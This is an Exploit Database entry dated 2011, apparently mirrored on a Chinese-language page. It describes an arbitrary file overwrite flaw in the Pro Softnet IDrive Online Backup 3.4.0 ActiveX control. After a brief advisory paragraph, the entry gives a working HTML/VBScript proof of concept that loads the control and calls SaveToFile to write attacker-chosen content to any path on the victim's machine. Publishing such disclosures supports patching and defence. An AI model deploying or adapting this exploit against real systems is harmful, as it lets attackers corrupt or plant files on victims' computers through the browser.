Pro Softnet IDrive Online Backup 3.4.0 – ActiveX ‘SaveToFile()’ Arbitrary File Overwrite

• Exploit Database
• 16 阅读

• 作者： High-Tech Bridge SA
  日期： 2011-07-06
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35928/

• source: https://www.securityfocus.com/bid/48582/info
  
  Pro Softnet IDrive Online Backup ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content.
  
  An attacker can exploit this issue to corrupt and overwrite arbitrary files on a victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
  
  IDrive Online Backup ActiveX control 3.4.0 is vulnerable; other versions may also be affected. 
  
  <html>
  <object classid=&#039;clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E&#039; id=&#039;target&#039; /></object>
  <input language=VBScript onclick=Boom() type=button value="Exploit">
  <script language = &#039;vbscript&#039;>
  
  Sub Boom()
  arg1="FilePath\File_name_to_rewrite_or_create"
  arg2=1
  arg3="New_File_Content"
  target.Text=arg3
  target.SelStart=0
  target.SelEnd=Len(arg3)
  target.SaveToFIle arg1,arg2
  End Sub
  
  </script>
  </html>